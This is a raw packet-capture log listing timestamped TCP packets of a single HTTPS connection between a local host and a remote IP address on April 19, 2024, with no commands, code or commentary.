Apr 19, 2024 07:35:59.062788010 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.063357115 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.063416958 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.063431025 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.072149992 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.072216988 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.072230101 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.072279930 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.072340012 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.072354078 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.072637081 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.072685003 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.072690964 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.072705030 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.072768927 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.072782993 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.073295116 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.073348045 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.073364019 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.073375940 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.073410034 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.073431015 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.152612925 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.152724028 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.163773060 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.163805008 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.163940907 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.163942099 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.163966894 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.164088964 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.164129019 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.164153099 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.164170980 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.164205074 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.164222956 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.165486097 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.165518999 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.165553093 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.165572882 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.165596008 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.165631056 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.166383982 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.166446924 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.167037964 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.167105913 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.167140961 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.167201042 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.175792933 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.175867081 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.176945925 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.176985025 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.177016020 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.177040100 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.177063942 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.177088022 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.177397013 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.177463055 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.177476883 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.177539110 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.178289890 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.178347111 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.224111080 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.224142075 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.224203110 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.224230051 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.224247932 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.224272013 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.256455898 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.256562948 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.267663002 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.267699003 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.267776012 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.267790079 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.267824888 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.267990112 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.268023014 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.268039942 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.268047094 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.268071890 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.268872023 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.268917084 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.268924952 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.268959999 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.269392967 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.269439936 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.269467115 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.269512892 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.270273924 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.270306110 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.270318985 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.270324945 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.270340919 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.270356894 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.271126986 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.271159887 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.271172047 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.271178961 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.271198034 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.271212101 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.271975994 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.272025108 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.272769928 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.272835970 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.272984982 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.273035049 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.273803949 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.273853064 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.273883104 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.273922920 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.274679899 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.274714947 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.274724007 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.274729967 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.274774075 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.275523901 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.275574923 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.275582075 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.275619030 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.275644064 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.275691986 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.277430058 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.277453899 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.277492046 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.277499914 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.277514935 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.278389931 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.278439045 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.278446913 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.278498888 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.280164003 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.280184984 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.280237913 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.280246019 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.280270100 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.280291080 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.281886101 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.281907082 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.281950951 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.281959057 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.281990051 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.282002926 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.283814907 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.283837080 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.283873081 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.283879995 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.283906937 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.283921003 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.285574913 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.285594940 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.285628080 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.285635948 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.285664082 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.285680056 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.287297964 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.287318945 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.287354946 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.287363052 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.287389994 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.287405014 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.288260937 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.288327932 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.289073944 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.289094925 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.289145947 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.289154053 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.289195061 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.289221048 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.328308105 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.328330994 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.328448057 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.328481913 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.328536987 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.329971075 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.329992056 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.330054045 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.330065012 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.330131054 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.371505976 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.371526003 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.371733904 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.371797085 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.371881008 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.372843027 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.372864962 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.372914076 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.372929096 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.372961044 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.372981071 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.374667883 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.374687910 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.374739885 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.374752998 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.374778986 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.374804974 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.376391888 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.376413107 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.376468897 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.376482964 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.376538038 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.378144979 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.378165960 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.378211975 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.378232002 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.378254890 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.378279924 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.379839897 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.379859924 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.379909039 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.379924059 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.379950047 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.379976034 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.382426023 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.382447958 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.382496119 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.382508993 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.382535934 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.382560968 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.384197950 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.384218931 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.384273052 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.384288073 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.384356022 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.385868073 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.385889053 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.385948896 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.385962963 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.386013985 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.388031006 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.388050079 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.388125896 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.388140917 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.388199091 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.389784098 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.389803886 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.389859915 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.389873981 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.389925957 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.391627073 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.391657114 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.391711950 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.391726017 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.391767979 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.391768932 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.393362045 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.393383026 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.393430948 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.393455982 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.393480062 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.393500090 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.395535946 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.395556927 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.395606041 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.395618916 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.395646095 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.395665884 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.397281885 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.397303104 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.397347927 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.397365093 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.397389889 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.397411108 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.399030924 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.399051905 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.399095058 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.399112940 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.399136066 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.399161100 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.400782108 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.400801897 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.400862932 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.400876999 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.400928974 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.402525902 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.402545929 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.402594090 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.402606964 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.402635098 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.402654886 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.404762030 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.404783964 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.404830933 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.404844999 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.404872894 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.404895067 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.406511068 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.406531096 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.406573057 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.406585932 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.406620979 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.406640053 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.408220053 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.408241034 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.408286095 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.408304930 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.408328056 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.408354044 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.410027027 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.410048008 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.410095930 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.410109043 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.410136938 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.410161972 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.411767006 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.411787033 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.411864042 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.411878109 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.411930084 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.413953066 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.413973093 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.414017916 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.414031029 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.414056063 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.414086103 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.415699005 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.415719986 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.415762901 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.415776014 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.415801048 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.415834904 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.417463064 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.417483091 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.417530060 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.417542934 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.417570114 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.417618990 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.431838036 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.431859016 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.431946993 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.431961060 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.432037115 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.433983088 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.434004068 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.434077024 CEST	49731	443	192.168.2.4	172.67.146.180
